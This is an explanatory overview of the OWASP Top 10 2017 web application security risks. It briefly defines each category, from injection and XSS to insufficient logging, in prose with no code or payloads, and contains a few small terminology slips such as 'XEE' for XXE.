OWASP TOP 10 2017
The OWASP Top 10 2017 is released in the year of 2017. This project shows the top ten most critical security risks in web applications.
A01:2017 - Injection
Example - SQL Injection, OS Command Injection
This attack is all about injecting SQL, NoSQL queries, OS commands and LDAP query into a web application. This attack can be exploited through input interface of the web application. Injection attack occurs when a data is inserted into an application from an untrusted source because of the lack of input validation and data sanitization, which can directly expose input into the query.
A02:2017 - Broken Authentication
Example - Session Timeout, Credential Stuffing
In this section, attackers exploit to impersonate a legitimate user online. This vulnerability is mostly seen in Session Management and Credential Management. Broken authentication vulnerability can lead to hijacking session IDs or stealing login credentials.
A03:2017 - Sensitive Data Exposure
Example - Unencrypted Data
Sensitive Data Exposure is also known as Information Disclosure or Leakage. This vulnerability occurs when a web application unknowingly discloses sensitive data to users who do not have the privilege to view or access those sensitive data.
A04:2017 - XML External Entities (XEE)
Example - File Retrieval, Blind XEE
This method gives access to malicious users to the intended web application that processes XML data or parses XML input. The XML input containing a reference to an external entity which is processed by an XML parse that was configured improperly. This allow an attacker to view files on the application server and to interact with any other backend or external system that the application can access. This attack can be escalated to SSRF (Server Side Request Forgery) attacks. The actual vulnerability lies in the way that the XML is parsed. When XML parses that allow DTD (Document Type Definition) retrieval, which do not have a proper input validation of the XML data in place, then it could be vulnerable to XXE injection allowing an attacker to inject command or content within an XML document.
A05:2017 - Broken Access Control
Example - Privilege Escalation, JWT Invalidation
This vulnerability always provide access to user account to an attacker and the attacker can act or operate like the administrator and access unauthorized data, sensitive files, and even change access rights.
A06:2017 - Security Misconfiguration
Example - Misconfigured HTTP Headers, Default Configuration
This happens when no secure configuration has been applied to the frameworks, application server, web server, database server of the platform of the application. Automated scanner tools will detect weaknesses like misconfiguration and default configurations. This kind of configuration flaw can give attackers the unauthorized access to some system data or functionality which can lead to complete system compromise or entire system shutdown.
A07:2017 - Cross Site Scripting (XSS)
Example :- Session Hijacking, Account Takeover, 2FA & MFA Bypass
Cross Site Scripting is a client side code injection attack. In this type of vulnerability, attacker tries to inject malicious script into a site. The script will be in the form of JS, which can redirect a victim from their legitimate site to an attacker site without knowledge. This weakness is an application allows an attacker to steal cookies, steal user session and thereby gaining illegitimate access to the system. There are three types of XSS attacks and they’re :-
1. Reflected XSS
Reflected XSS is a non-persistent XSS. That means, this doesn’t store attacker’s payload. This type of attack happens when the user inputs are reflected by a web application error message, webpage search result, or other response that includes some of all of the inputs provided by the user as part of the request without making the data safe to be rendered in the browser.
2. Stored XSS
Stored XSS is a persistent XSS because, this does store attacker’s payload o the web server or database. This usually occurs when user input is stored on the target server as the database, message forum, and comment field. A victim can get the stored data from the web application without the data safe to be rendered in the browser. When a stored XSS payload is injected, then every user that visits that page would see the impact of the injected XSS script.
3. DOM XSS (0 XSS / Zero XSS)
DOM XSS attack occurs due to the modification of DOM based on user supplied input. JS receives a user-controllable code and passes it to a sink for code execution. Some examples of sinks are inner HTML, document.write, window.location etc.
A08:2017 - Insecure Deserialization
Example - Remote Execution Attacks
This security weakness can cause Remote Code Execution (RCE) attacks. Insecure deserialization vulnerability occurs when user-controllable data is deserialized by a website. This security flaw enables an attacker to manipulate serialized objects in order to pass harmful data into the web application code. Insecure deserialization sometimes can also be called Object Injection Vulnerability.
A09:2017 - Using Components With Known Vulnerabilities
Example - Open Source Vulnerable Components
This vulnerability results from a developer using a component, framework, library, or some dependencies that already have a known vulnerability, that may compromise the entire system. When such components are executed with full privileges, it is vulnerable. This vulnerability might cause some serious data loss or server takeover.
A10:2017 - Insufficient Logging & Monitoring
Example - Missing Security Information, Missing Logs
Insufficient logging & monitoring happens due to lack of recording of information about events. Ignoring warnings, errors, log messages are risky. Without logging and monitoring, web application is unable to detect, escalate or alert for active attacks. Penetration testing and vulnerability scans do not trigger alerts.
